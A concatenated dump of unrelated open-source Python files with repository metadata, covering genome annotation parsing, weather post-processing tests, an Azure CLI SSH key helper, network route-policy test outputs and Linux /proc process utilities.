t.exons.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'CDS':
tid = info['transcript_id']
if tid not in id2ent:
id2ent[tid] = Transcript(transcript_type=info['transcript_type'])
if tid not in id2ent: id2ent[tid] = Transcript()
t = id2ent[tid]
t.cds.append((int(fields[3]), int(fields[4])))
err_print("loaded %d transcripts from GENCODE GTF file." % cnt)
def parse_aceview_transcripts(aceview_gff_fn, name2gene):
id2tpt = {}
aceview_fh = opengz(aceview_gff_fn)
for line in aceview_fh:
if line.startswith('#'): continue
fields = line.strip().split('\t')
if len(fields) < 9: continue # the old transcript definition (hg18) from AceView is a bit corrupted.
info = dict(re.findall(r'\s*(\S+) (\S+);', fields[8]))
if fields[2] == 'CDS':
gene_name = info['gene_id'].upper()
if gene_name in name2gene:
g = name2gene[gene_name]
else:
g = Gene(name=gene_name)
name2gene[gene_name] = g
if info['transcript_id'] in id2tpt:
t = id2tpt[info['transcript_id']]
else:
t = Transcript()
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.name = info['transcript_id']
id2tpt[t.name] = t
t.gene = g
g.tpts.append(t)
t.source = 'AceView'
t.cds.append((int(fields[3]), int(fields[4])))
elif fields[2] == 'exon':
gene_name = info['gene_id'].upper()
if gene_name in name2gene:
g = name2gene[gene_name]
else:
g = Gene(name=gene_name)
name2gene[gene_name] = g
if info['transcript_id'] in id2tpt:
t = id2tpt[info['transcript_id']]
else:
t = Transcript()
t.chrm = normalize_chrm(fields[0])
t.strand = fields[6]
t.name = info['transcript_id']
id2tpt[t.name] = t
t.gene = g
g.tpts.append(t)
t.source = 'AceView'
t.exons.append((int(fields[3]), int(fields[4])))
# skip transcripts without CDS, e.g., LOC391566.aAug10-unspliced
for tid, t in id2tpt.items():
if t.cds and t.exons:
t.exons.sort()
t.beg = t.exons[0][0]
t.end = t.exons[-1][1]
else:
t.gene.tpts.remove(t)
err_print("loaded %d transcripts from AceView GFF file." % len(id2tpt))
def parse_uniprot_mapping(fn):
tid2uniprot = {}
for line in opengz(fn):
fields = line.strip().split('\t')
if fields[2] != fields[0]:
# tid2uniprot[fields[2]] = fields[0]
if fields[0] in tid2uniprot:
tid2uniprot[fields[0]].append(fields[2])
else:
tid2uniprot[fields[0]] = [fields[2]]
err_print('loaded %d transcript with UniProt mapping.' % len(tid2uniprot))
return tid2uniprot
# def parse_annotation(args):
# name2gene = {}
# if args.ensembl:
# if args.refversion in ['hg18']:
# parse_ensembl_gtf_hg18(args.ensembl, name2gene)
# else:
# parse_ensembl_gtf(args.ensembl, name2gene)
# if args.refseq:
# parse_refseq_gff(args.refseq, name2gene)
# if args.ccds:
# parse_ccds_table(args.ccds, name2gene)
# if args.gencode:
# parse_gencode_gtf(args.gencode, name2gene)
# # try:
# # import pysam
# # args.ffhs['GENCODE'] = pysam.Tabixfile(args.gencode)
# # except:
# # err_print("Cannot import non-coding features (may need pysam).")
# if args.ucsc:
# parse_ucsc_refgene(args.ucsc, name2gene)
# # if args.custom:
# # parse_ucsc_refgene_customized(args.custom, name2gene)
# if args.kg:
# parse_ucsc_kg_table(args.kg, args.alias, name2gene)
# if args.aceview:
# parse_aceview_transcripts(args.aceview, name2gene)
# # remove genes without transcripts
# names_no_tpts = []
# for name, gene in name2gene.items():
# # print gene, len(gene.tpts)
# if not gene.tpts:
# names_no_tpts.append(name)
# for name in names_no_tpts:
# del name2gene[name]
# err_print('loaded %d genes.' % len(name2gene))
# # index transcripts in a gene
# thash = THash()
# genes = set(name2gene.values())
# for g in genes:
# for t in g.tpts:
# t.exons.sort()
# if not (hasattr(t, 'cds_beg') and hasattr(t, 'cds_end')):
# if t.cds:
# t.cds.sort()
# t.cds_beg = t.cds[0][0]
# t.cds_end = t.cds[-1][1]
# elif hasattr(t,'beg') and hasattr(t,'end'):
# t.cds_beg = t.beg
# t.cds_end = t.end
# else:
# t.cds_beg = t.exons[0][0]
# t.cds_end = t.exons[-1][1]
# thash.insert(t)
# if len(t.exons) == 0: # if no exon, use cds
# t.exons = t.cds[:]
# g.std_tpt = g.longest_tpt()
# if args.uniprot:
# tid2uniprot = parse_uniprot_mapping(args.uniprot)
# name2protein = {}
# for name, gene in name2gene.items():
# for tpt in gene.tpts:
# if tpt.name in tid2uniprot:
# uniprot = tid2uniprot[tpt.name]
# if uniprot not in name2protein:
# name2protein[uniprot] = Gene(uniprot)
# prot = name2protein[uniprot]
# prot.tpts.append(tpt)
# return name2protein, thash
# else:
# return name2gene, thash
|
8100129a2ce5842d9423399fcc8273b3032faa8f
|
9cc6f9d9eed9aceb5efa56e3b2f364900df11051
|
/improver_tests/precipitation_type/hail_fraction/test_HailFraction.py
|
79882230168536e46eceac2bc74d807f30025588
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
metoppv/improver
|
8553a4f8b93c88291bde0db8f5dfd7b577c04b92
|
cd2c9019944345df1e703bf8f625db537ad9f559
|
refs/heads/master
| 2023-08-30T19:01:04.946698
| 2023-08-25T13:57:20
| 2023-08-25T13:57:20
| 85,334,761
| 101
| 88
|
BSD-3-Clause
| 2023-09-14T19:07:45
| 2017-03-17T16:51:29
|
Python
|
UTF-8
|
Python
| false
| false
| 7,280
|
py
|
test_HailFraction.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown copyright. The Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Tests for the HailFraction plugin."""
import iris
import numpy as np
import pytest
from improver.precipitation_type.hail_fraction import HailFraction
from improver.synthetic_data.set_up_test_cubes import set_up_variable_cube
COMMON_ATTRS = {
"source": "Unit test",
"institution": "Met Office",
"title": "Post-Processed IMPROVER unit test",
}
def setup_cubes():
"""Set up cubes for testing."""
vertical_updraught_data = np.zeros((2, 2), dtype=np.float32)
vertical_updraught = set_up_variable_cube(
vertical_updraught_data,
"maximum_vertical_updraught",
"m s-1",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
hail_size_data = np.zeros((2, 2), dtype=np.float32)
hail_size = set_up_variable_cube(
hail_size_data,
"size_of_hail_stones",
"m",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
cloud_condensation_level_data = np.zeros((2, 2), dtype=np.float32)
cloud_condensation_level = set_up_variable_cube(
cloud_condensation_level_data,
"air_temperature_at_condensation_level",
"K",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
convective_cloud_top_data = np.zeros((2, 2), dtype=np.float32)
convective_cloud_top = set_up_variable_cube(
convective_cloud_top_data,
"air_temperature_at_convective_cloud_top",
"K",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
hail_melting_level_data = np.zeros((2, 2), dtype=np.float32)
hail_melting_level = set_up_variable_cube(
hail_melting_level_data,
"altitude_of_rain_from_hail_falling_level",
"m",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
altitude_data = np.zeros((2, 2), dtype=np.float32)
altitude = set_up_variable_cube(
altitude_data,
"altitude",
"m",
spatial_grid="equalarea",
attributes=COMMON_ATTRS,
standard_grid_metadata="gl_ens",
)
return (
vertical_updraught,
hail_size,
cloud_condensation_level,
convective_cloud_top,
hail_melting_level,
altitude,
)
@pytest.mark.parametrize("model_id_attr", (None, "mosg__model_configuration"))
@pytest.mark.parametrize(
"vertical_updraught_value,hail_size_value,cloud_condensation_level_value,"
+ "convective_cloud_top_value,hail_melting_level_value,altitude_value,expected",
(
# No indications of hail
(1, 0.0, 263.15, 261.15, 100, 50, 0),
# Larger updraught, no other indications of hail
(25, 0.001, 263.15, 261.15, 100, 50, 0),
# Low vertical updraught prevents hail
(5, 0.001, 271.15, 253.15, 20, 50, 0),
# Sufficient vertical updraught, non-zero hail fraction
(25, 0.001, 271.15, 253.15, 20, 50, 1 / 9),
# Sufficient vertical updraught, non-zero hail fraction
(50, 0.001, 271.15, 253.15, 20, 50, 0.25),
# Large vertical updraught, non-zero hail fraction
(75, 0.001, 271.15, 253.15, 20, 50, 0.25),
# Hail size indicates non-zero hail fraction
(1, 0.003, 271.15, 253.15, 20, 50, 0.05),
# Cloud condensation level temperature prevents hail
(75, 0.001, 263.15, 253.15, 20, 50, 0),
# Convective cloud top temperature prevents hail
(75, 0.001, 271.15, 263.15, 20, 50, 0),
# Hail melting level prevents hail
(75, 0.001, 271.15, 253.15, 100, 50, 0),
# Hail size causes non-zero hail fraction despite inhibitive cloud condensation
# level temperature, convective cloud top temperature and hail melting level
(1, 0.003, 263.15, 263.15, 100, 50, 0.05),
),
)
def test_basic(
vertical_updraught_value,
hail_size_value,
cloud_condensation_level_value,
convective_cloud_top_value,
hail_melting_level_value,
altitude_value,
expected,
model_id_attr,
):
"""Test hail fraction plugin."""
expected_attributes = COMMON_ATTRS.copy()
if model_id_attr:
expected_attributes[model_id_attr] = setup_cubes()[0].attributes[model_id_attr]
(
vertical_updraught,
hail_size,
cloud_condensation_level,
convective_cloud_top,
hail_melting_level,
altitude,
) = setup_cubes()
vertical_updraught.data = np.full_like(
vertical_updraught.data, vertical_updraught_value
)
hail_size.data = np.full_like(hail_size.data, hail_size_value)
cloud_condensation_level.data = np.full_like(
cloud_condensation_level.data, cloud_condensation_level_value,
)
convective_cloud_top.data = np.full_like(
convective_cloud_top.data, convective_cloud_top_value,
)
hail_melting_level.data = np.full_like(
hail_melting_level.data, hail_melting_level_value
)
altitude.data = np.full_like(altitude.data, altitude_value)
result = HailFraction(model_id_attr=model_id_attr)(
vertical_updraught,
hail_size,
cloud_condensation_level,
convective_cloud_top,
hail_melting_level,
altitude,
)
assert isinstance(result, iris.cube.Cube)
assert str(result.units) == "1"
assert result.name() == "hail_fraction"
assert result.attributes == expected_attributes
np.testing.assert_allclose(result.data, expected)
|
9cf6a3d42c9b1303b6c6acf68313d6e5642e4962
|
a4ea525e226d6c401fdb87a6e9adfdc5d07e6020
|
/src/azure-cli/azure/cli/command_modules/vm/manual/custom.py
|
70ff60d5600ca9dbcab8e1fff1e6217fa06e0a60
|
[
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] |
permissive
|
Azure/azure-cli
|
13340eeca2e288e66e84d393fa1c8a93d46c8686
|
a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca
|
refs/heads/dev
| 2023-08-17T06:25:37.431463
| 2023-08-17T06:00:10
| 2023-08-17T06:00:10
| 51,040,886
| 4,018
| 3,310
|
MIT
| 2023-09-14T11:11:05
| 2016-02-04T00:21:51
|
Python
|
UTF-8
|
Python
| false
| false
| 2,278
|
py
|
custom.py
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.log import get_logger
logger = get_logger(__name__)
def sshkey_create(client,
resource_group_name,
ssh_public_key_name,
location,
tags=None,
public_key=None):
import time
from pathlib import Path
parameters = {
'location': location,
'tags': tags,
'public_key': public_key
}
client.create(resource_group_name=resource_group_name,
ssh_public_key_name=ssh_public_key_name,
parameters=parameters)
if public_key is None: # Generate one if public key is None
logger.warning('No public key is provided. A key pair is being generated for you.')
key_pair = client.generate_key_pair(
resource_group_name=resource_group_name, ssh_public_key_name=ssh_public_key_name)
# Save keys to local files
private_key = key_pair.private_key
public_key = key_pair.public_key
sshpath = Path.home().joinpath('.ssh')
# Create ~/.ssh if it does not exist
if not sshpath.exists():
sshpath.mkdir()
# File path
private_key_file = str(sshpath.joinpath(str(time.time()).replace('.', '_')))
public_key_file = private_key_file + '.pub'
# Write to files
with open(private_key_file, 'w', newline='\n') as f:
f.write(private_key)
logger.warning('Private key is saved to "%s".', private_key_file)
with open(public_key_file, 'w', newline='\n') as f:
f.write(public_key)
logger.warning('Public key is saved to "%s".', public_key_file)
return client.get(resource_group_name=resource_group_name,
ssh_public_key_name=ssh_public_key_name)
|
6790aa64d0d5c99e0405168728d8c7e2ddc8439a
|
b347bc4b850dee4a8a9a171b563a3f31230ce1c7
|
/sktime/regression/interval_based/__init__.py
|
571711f5be59a3afc980128eefc579bcfe4eba46
|
[
"BSD-3-Clause"
] |
permissive
|
sktime/sktime
|
5963962df338c5931a2f9f1794d1203c50ddc27e
|
70b2bfaaa597eb31bc3a1032366dcc0e1f4c8a9f
|
refs/heads/main
| 2023-08-22T18:20:08.022950
| 2023-08-22T15:24:39
| 2023-08-22T15:24:39
| 156,401,841
| 1,117
| 268
|
BSD-3-Clause
| 2023-09-14T20:44:21
| 2018-11-06T15:08:24
|
Python
|
UTF-8
|
Python
| false
| false
| 235
|
py
|
__init__.py
|
#!/usr/bin/env python3 -u
"""Implement interval based time series regression estimators."""
__author__ = ["mloning"]
__all__ = ["TimeSeriesForestRegressor"]
from sktime.regression.interval_based._tsf import TimeSeriesForestRegressor
|
e5da547a20e7ecef06da556fac6d2946578f4b24
|
a115d1ea106a890a877d902efc70e3f806525de8
|
/tests/test_metric_logger.py
|
a5b884c908103f4cbdf364b94f4894083cff420b
|
[
"Python-2.0",
"MIT"
] |
permissive
|
KaihuaTang/Scene-Graph-Benchmark.pytorch
|
7b59051e78d566f1b94836280ca91a61e2503bb4
|
4b6b71a90d4198d9dae574d42b062a5e534da291
|
refs/heads/master
| 2023-08-04T18:32:27.979660
| 2022-07-29T06:16:23
| 2022-07-29T06:16:23
| 241,830,209
| 1,002
| 261
|
MIT
| 2023-07-30T08:37:14
| 2020-02-20T08:23:54
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 789
|
py
|
test_metric_logger.py
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import unittest
from maskrcnn_benchmark.utils.metric_logger import MetricLogger
class TestMetricLogger(unittest.TestCase):
def test_update(self):
meter = MetricLogger()
for i in range(10):
meter.update(metric=float(i))
m = meter.meters["metric"]
self.assertEqual(m.count, 10)
self.assertEqual(m.total, 45)
self.assertEqual(m.median, 4)
self.assertEqual(m.avg, 4.5)
def test_no_attr(self):
meter = MetricLogger()
_ = meter.meters
_ = meter.delimiter
def broken():
_ = meter.not_existent
self.assertRaises(AttributeError, broken)
if __name__ == "__main__":
unittest.main()
|
a8e76955a12ee407cb121f7a519f41ce6ce2f16a
|
f509ab9825c542e09b0c6591d86ef1f9feb540a6
|
/pkgs/ops-pkg/src/genie/libs/ops/route_policy/iosxr/tests/route_policy_output.py
|
8bcd587c92b9db2be20bacae9b6aae42ad124a47
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genielibs
|
97f597117193aaa18028defeb69078ebb241173a
|
e42e51475cddcb10f5c7814d0fe892ac865742ba
|
refs/heads/master
| 2023-08-11T16:39:41.959947
| 2023-07-27T17:58:42
| 2023-07-27T17:58:42
| 130,717,047
| 109
| 60
|
Apache-2.0
| 2023-08-29T22:32:08
| 2018-04-23T15:21:56
|
Python
|
UTF-8
|
Python
| false
| false
| 15,150
|
py
|
route_policy_output.py
|
'''
RoutePolicy Genie Ops Object Outputs for IOSXR.
'''
class RoutePolicyOutput(object):
showRplRoutePolicy = {'NO-EXPORT':
{'description': 'test15',
'statements':
{10:
{'actions':
{'actions': 'pass',
'set_community_list': 'no-export'},
'conditions':
{'match_prefix_list': 'NO-EXPORT'}}}},
'all-pass':
{'statements':
{1:
{'actions': {'actions': 'pass'},
'conditions': {}}}},
'allpass':
{'statements':
{10:
{'actions': {'actions': 'pass'},
'conditions': {}}}},
'as-path':
{'statements':
{10: {'actions': {},
'conditions': {}}}},
'aspath':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_as_path_list': 'test'}},
20:
{'actions': {'actions': 'drop'},
'conditions': {}}}},
'test':
{'statements':
{10:
{'actions':
{'set_route_origin': 'incomplete'},
'conditions':
{'match_local_pref_eq': '123'}},
20:
{'actions': {'set_weight': '44'},
'conditions': {'match_med_eq': 100}},
1:
{'actions':
{'set_route_origin': 'incomplete'},
'conditions': {}}}},
'test-community':
{'statements':
{10:
{'actions':
{'set_community': ['100:1','200:1','300:1'],
'set_community_no_advertise': True,
'set_community_no_export': True},
'conditions': {}},
20:
{'actions':
{'set_community': ['111:1','222:1'],
'set_community_additive': True,
'set_community_no_advertise': True,
'set_ext_community_rt': ['100:1','200:1'],
'set_ext_community_rt_additive': True},
'conditions': {}}}},
'test2':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions': {'match_origin_eq': 'eg'}},
20:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_nexthop_in': 'prefix-set'}},
30:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_local_pref_eq': '13'}}}},
'test3':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions': {}},
20:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_area_eq': '1'}},
30:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_prefix_list': 'prefix-set'}},
40:
{'actions':
{'actions': 'pass'},
'conditions': {}},
50: {'actions':
{'set_as_path_prepend': 100,
'set_as_path_prepend_repeat_n': 10,
'set_community': ['100:100'],
'set_community_additive': True,
'set_community_delete': 'test',
'set_community_list': 'test',
'set_community_no_advertise': True,
'set_community_no_export': True,
'set_ext_community_delete': 'test',
'set_ext_community_rt': ['300:1','300:2'],
'set_ext_community_rt_additive': True,
'set_ext_community_soo': '100:100',
'set_ext_community_soo_additive': True,
'set_level': 'level-1-2',
'set_local_pref': 100,
'set_med': 113,
'set_metric': '100',
'set_metric_type': 'type-2',
'set_next_hop': '10.4.1.1',
'set_ospf_metric': '100',
'set_route_origin': 'egp',
'set_tag': '111'},
'conditions': {}}}},
'testtest':
{'statements':
{10:
{'actions':
{'set_local_pref': 120,
'set_med': 111,
'set_metric_type': 'type-1',
'set_next_hop': '192.168.1.1'},
'conditions': {'match_med_eq': 10}
}
}
}
}
RoutePolicy = {'info':
{'NO-EXPORT':
{'description': 'test15',
'statements':
{10:
{'actions':
{'actions': 'pass',
'set_community_list': 'no-export'},
'conditions':
{'match_prefix_list': 'NO-EXPORT'}}}},
'all-pass':
{'statements':
{1:
{'actions': {'actions': 'pass'},
'conditions': {}}}},
'allpass':
{'statements':
{10:
{'actions': {'actions': 'pass'},
'conditions': {}}}},
'as-path':
{'statements':
{10: {'actions': {},
'conditions': {}}}},
'aspath':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_as_path_list': 'test'}},
20:
{'actions': {'actions': 'drop'},
'conditions': {}}}},
'test':
{'statements':
{10:
{'actions':
{'set_route_origin': 'incomplete'},
'conditions':
{'match_local_pref_eq': '123'}},
20:
{'actions': {'set_weight': '44'},
'conditions': {'match_med_eq': 100}},
1:
{'actions':
{'set_route_origin': 'incomplete'},
'conditions': {}}}},
'test-community':
{'statements':
{10:
{'actions':
{'set_community': ['100:1','200:1','300:1'],
'set_community_no_advertise': True,
'set_community_no_export': True},
'conditions': {}},
20:
{'actions':
{'set_community': ['111:1','222:1'],
'set_community_additive': True,
'set_community_no_advertise': True,
'set_ext_community_rt': ['100:1','200:1'],
'set_ext_community_rt_additive': True},
'conditions': {}}}},
'test2':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions': {'match_origin_eq': 'eg'}},
20:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_nexthop_in': 'prefix-set'}},
30:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_local_pref_eq': '13'}}}},
'test3':
{'statements':
{10:
{'actions':
{'actions': 'pass'},
'conditions': {}},
20:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_area_eq': '1'}},
30:
{'actions':
{'actions': 'pass'},
'conditions':
{'match_prefix_list': 'prefix-set'}},
40:
{'actions':
{'actions': 'pass'},
'conditions': {}},
50: {'actions':
{'set_as_path_prepend': 100,
'set_as_path_prepend_repeat_n': 10,
'set_community': ['100:100'],
'set_community_additive': True,
'set_community_delete': 'test',
'set_community_list': 'test',
'set_community_no_advertise': True,
'set_community_no_export': True,
'set_ext_community_delete': 'test',
'set_ext_community_rt': ['300:1','300:2'],
'set_ext_community_rt_additive': True,
'set_ext_community_soo': '100:100',
'set_ext_community_soo_additive': True,
'set_level': 'level-1-2',
'set_local_pref': 100,
'set_med': 113,
'set_metric': '100',
'set_metric_type': 'type-2',
'set_next_hop': '10.4.1.1',
'set_ospf_metric': '100',
'set_route_origin': 'egp',
'set_tag': '111'},
'conditions': {}}}},
'testtest':
{'statements':
{10:
{'actions':
{'set_local_pref': 120,
'set_med': 111,
'set_metric_type': 'type-1',
'set_next_hop': '192.168.1.1'},
'conditions': {'match_med_eq': 10}
}
}
}
}
}
|
e151f2e12925d3600374d2cf0fa97780e7221baa
|
df87814cb32990ad8c27d0b13a821aabce012819
|
/kolibri/utils/pskolibri/_pslinux.py
|
0e328942d96fef56ebc317029aebe6196f2226da
|
[
"MIT"
] |
permissive
|
learningequality/kolibri
|
26812d4ae771f3b389d3317a586bc032fc84866b
|
cc9da2a6acd139acac3cd71c4cb05c15d4465712
|
refs/heads/release-v0.16.x
| 2023-09-01T18:07:29.720772
| 2023-08-31T15:43:47
| 2023-08-31T15:43:47
| 49,976,939
| 689
| 682
|
MIT
| 2023-09-14T20:02:29
| 2016-01-19T19:22:07
|
Python
|
UTF-8
|
Python
| false
| false
| 10,293
|
py
|
_pslinux.py
|
"""Linux platform implementation."""
from __future__ import absolute_import
from __future__ import division
import errno
import functools
import os
import re
import sys
from collections import namedtuple
from kolibri.utils.pskolibri.common import AccessDenied
from kolibri.utils.pskolibri.common import b
from kolibri.utils.pskolibri.common import memoize
from kolibri.utils.pskolibri.common import memoize_when_activated
from kolibri.utils.pskolibri.common import NoSuchProcess
from kolibri.utils.pskolibri.common import open_binary
from kolibri.utils.pskolibri.common import open_text
from kolibri.utils.pskolibri.common import pcputimes
CLOCK_TICKS = os.sysconf("SC_CLK_TCK")
PAGESIZE = os.sysconf("SC_PAGE_SIZE")
BOOT_TIME = None # set later
svmem = namedtuple("svmem", ["total", "used"])
pmem = namedtuple("pmem", "rss vms shared text lib data dirty")
def get_procfs_path():
"""Return updated psutil.PROCFS_PATH constant."""
return sys.modules["kolibri.utils.pskolibri"].PROCFS_PATH
@memoize
def set_scputimes_ntuple(procfs_path):
"""Set a namedtuple of variable fields depending on the CPU times
available on this Linux kernel version which may be:
(user, nice, system, idle, iowait, irq, softirq, [steal, [guest,
[guest_nice]]])
Used by cpu_times() function.
"""
global scputimes
with open_binary("%s/stat" % procfs_path) as f:
values = f.readline().split()[1:]
fields = ["user", "nice", "system", "idle", "iowait", "irq", "softirq"]
vlen = len(values)
if vlen >= 8:
# Linux >= 2.6.11
fields.append("steal")
if vlen >= 9:
# Linux >= 2.6.24
fields.append("guest")
if vlen >= 10:
# Linux >= 3.2.0
fields.append("guest_nice")
scputimes = namedtuple("scputimes", fields)
def cpu_times():
"""Return a named tuple representing the following system-wide
CPU times:
(user, nice, system, idle, iowait, irq, softirq [steal, [guest,
[guest_nice]]])
Last 3 fields may not be available on all Linux kernel versions.
"""
procfs_path = get_procfs_path()
set_scputimes_ntuple(procfs_path)
with open_binary("%s/stat" % procfs_path) as f:
values = f.readline().split()
fields = values[1 : len(scputimes._fields) + 1]
fields = [float(x) / CLOCK_TICKS for x in fields]
return scputimes(*fields)
def virtual_memory():
"""Report virtual memory stats.
This implementation matches "free" and "vmstat -s" cmdline
utility values and procps-ng-3.3.12 source was used as a reference
(2016-09-18):
https://gitlab.com/procps-ng/procps/blob/
24fd2605c51fccc375ab0287cec33aa767f06718/proc/sysinfo.c
For reference, procps-ng-3.3.10 is the version available on Ubuntu
16.04.
Note about "available" memory: up until psutil 4.3 it was
calculated as "avail = (free + buffers + cached)". Now
"MemAvailable:" column (kernel 3.14) from /proc/meminfo is used as
it's more accurate.
That matches "available" column in newer versions of "free".
"""
missing_fields = []
mems = {}
with open_binary("%s/meminfo" % get_procfs_path()) as f:
for line in f:
fields = line.split()
mems[fields[0]] = int(fields[1]) * 1024
# /proc doc states that the available fields in /proc/meminfo vary
# by architecture and compile options, but these 3 values are also
# returned by sysinfo(2); as such we assume they are always there.
total = mems[b"MemTotal:"]
free = mems[b"MemFree:"]
try:
buffers = mems[b"Buffers:"]
except KeyError:
buffers = 0
missing_fields.append("buffers")
try:
cached = mems[b"Cached:"]
except KeyError:
cached = 0
missing_fields.append("cached")
else:
cached += mems.get(b"SReclaimable:", 0) # since kernel 2.6.19
used = total - free - cached - buffers
if used < 0:
# May be symptomatic of running within a LCX container where such
# values will be dramatically distorted over those of the host.
used = total - free
return svmem(total, used)
def pids():
"""Returns a list of PIDs currently running on the system."""
return [int(x) for x in os.listdir(b(get_procfs_path())) if x.isdigit()]
def cpu_count_logical():
"""Return the number of logical CPUs in the system."""
try:
return os.sysconf("SC_NPROCESSORS_ONLN")
except ValueError:
# as a second fallback we try to parse /proc/cpuinfo
num = 0
with open_binary("%s/cpuinfo" % get_procfs_path()) as f:
for line in f:
if line.lower().startswith(b"processor"):
num += 1
# unknown format (e.g. amrel/sparc architectures), see:
# https://github.com/giampaolo/psutil/issues/200
# try to parse /proc/stat as a last resort
if num == 0:
search = re.compile(r"cpu\d")
with open_text("%s/stat" % get_procfs_path()) as f:
for line in f:
line = line.split(" ")[0]
if search.match(line):
num += 1
if num == 0:
# mimic os.cpu_count()
return None
return num
def wrap_exceptions(fun):
"""Decorator which translates bare OSError and IOError exceptions
into NoSuchProcess and AccessDenied.
"""
@functools.wraps(fun)
def wrapper(self, *args, **kwargs):
try:
return fun(self, *args, **kwargs)
except EnvironmentError as err:
if err.errno in (errno.EPERM, errno.EACCES):
raise AccessDenied()
# ESRCH (no such process) can be raised on read() if
# process is gone in the meantime.
if err.errno == errno.ESRCH:
raise NoSuchProcess()
# ENOENT (no such file or directory) can be raised on open().
if err.errno == errno.ENOENT and not os.path.exists(
"%s/%s" % (self._procfs_path, self.pid)
):
raise NoSuchProcess()
# Note: zombies will keep existing under /proc until they're
# gone so there's no way to distinguish them in here.
raise
return wrapper
def boot_time():
"""Return the system boot time expressed in seconds since the epoch."""
global BOOT_TIME
path = "%s/stat" % get_procfs_path()
with open_binary(path) as f:
for line in f:
if line.startswith(b"btime"):
ret = float(line.strip().split()[1])
BOOT_TIME = ret
return ret
raise RuntimeError("line 'btime' not found in %s" % path)
class Process(object):
"""Linux process implementation."""
__slots__ = ["pid", "_name", "_ppid", "_procfs_path"]
def __init__(self, pid):
self.pid = pid
self._name = None
self._ppid = None
self._procfs_path = get_procfs_path()
@memoize_when_activated
def _parse_stat_file(self):
"""Parse /proc/{pid}/stat file. Return a list of fields where
process name is in position 0.
Using "man proc" as a reference: where "man proc" refers to
position N, always substract 2 (e.g starttime pos 22 in
'man proc' == pos 20 in the list returned here).
The return value is cached in case oneshot() ctx manager is
in use.
"""
with open_binary("%s/%s/stat" % (self._procfs_path, self.pid)) as f:
data = f.read()
# Process name is between parentheses. It can contain spaces and
# other parentheses. This is taken into account by looking for
# the first occurrence of "(" and the last occurence of ")".
rpar = data.rfind(b")")
name = data[data.find(b"(") + 1 : rpar]
others = data[rpar + 2 :].split()
return [name] + others
@wrap_exceptions
def cmdline(self):
with open_text("%s/%s/cmdline" % (self._procfs_path, self.pid)) as f:
data = f.read()
if not data:
# may happen in case of zombie process
return []
sep = "\x00" if data.endswith("\x00") else " "
if data.endswith(sep):
data = data[:-1]
return [x for x in data.split(sep)]
@wrap_exceptions
def create_time(self):
values = self._parse_stat_file()
# According to documentation, starttime is in field 21 and the
# unit is jiffies (clock ticks).
# We first divide it for clock ticks and then add uptime returning
# seconds since the epoch, in UTC.
# Also use cached value if available.
bt = BOOT_TIME or boot_time()
return (float(values[20]) / CLOCK_TICKS) + bt
@wrap_exceptions
def memory_info(self):
# ============================================================
# | FIELD | DESCRIPTION | AKA | TOP |
# ============================================================
# | rss | resident set size | | RES |
# | vms | total program size | size | VIRT |
# | shared | shared pages (from shared mappings) | | SHR |
# | text | text ('code') | trs | CODE |
